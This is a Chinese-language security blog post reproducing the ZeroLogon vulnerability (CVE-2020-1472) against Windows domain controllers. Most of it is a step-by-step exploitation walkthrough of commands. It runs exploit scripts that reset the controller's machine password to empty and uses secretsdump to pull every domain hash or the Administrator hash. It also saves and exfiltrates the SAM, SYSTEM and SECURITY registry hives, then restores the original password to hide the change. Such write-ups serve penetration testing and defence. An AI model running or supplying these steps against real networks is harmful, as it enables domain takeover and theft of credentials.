CVE-2020-1472_ZeroLogon复现

admin 2024年2月15日14:35:48评论9 views字数 1598阅读5分19秒阅读模式

 漏洞描述:

当攻击者使用 Netlogon 远程协议 (MS-NRPC) 与域控制器建立易受攻击的 Netlogon 安全通道连接时,就会存在特权提升漏洞(也称为“Netlogon 特权提升漏洞”)。

利用过程:

1、将域控账户密码置换为空绕过认证。

2、导出/获取域控中的账户Hash。

3、恢复攻击之前的Hash。

影响版本:

Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2012Windows Server 2012 (Server Core installation)Windows Server 2012 R2Windows Server 2012 R2 (Server Core installation)Windows Server 2016Windows Server 2016  (Server Core installation)Windows Server 2019Windows Server 2019  (Server Core installation)Windows Server, version 1903 (Server Core installation)    Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)

POC:

1、脚本检测

        域控机器名、IP

python3 zerologon_tester.py主机名IP 

2、MIMIkaz检测

        mimikaz可以检测也可以利用,无法域外利用时等情况可以考虑mimikaz上机利用。

privilege::debuglsadump::zerologon /target:           /account:<主机名>$

EXP:

(1) 使用cve-2020-1472-exploit.py 将账户密码置换为空

python3 cve-2020-1472-exploit.py 主机名IP

CVE-2020-1472_ZeroLogon复现

(2) 这里导出Hash检查刚才重置账户的密码是否为空。用于验证是否攻击成功    

        impacket导出所有Hash

secretsdump.py  域/机器名$@目标IP    -no-pass

        只导出域管Hash

proxychains4 secretsdump.py域/机器名$@IP -no-pass  | grep 'Administrator'

CVE-2020-1472_ZeroLogon复现

(3) 恢复密码,备份注册表,并保存到本地,保存后删除备份的注册表

使用hash传递上域控执行命令

reg save HKLMSYSTEM system.savereg save HKLMSAM sam.savereg save HKLMSECURITY security.savelget system.savelget sam.save    lget security.savedel /f system.savedel /f sam.savedel /f security.save

CVE-2020-1472_ZeroLogon复现

CVE-2020-1472_ZeroLogon复现

(4) 获取恢复Hash需要的字段

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

$MACHINE.ACC:plain_password_hex:后的值为下一步恢复密码需要的值    

CVE-2020-1472_ZeroLogon复现

(5) 恢复Hash

python3 reinstall_original_pw.py 机器名  IP d00b827a9......

CVE-2020-1472_ZeroLogon复现

(6) 检测是否成功还原

secretsdump.py 域/机器名$@目标IP    -no-pass

CVE-2020-1472_ZeroLogon复现

CVE-2020-1472_ZeroLogon复现

原文始发于微信公众号(YongYe 安全实验室):CVE-2020-1472_ZeroLogon复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日14:35:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-1472_ZeroLogon复现https://cn-sec.com/archives/2194842.html

发表评论

匿名网友 填写信息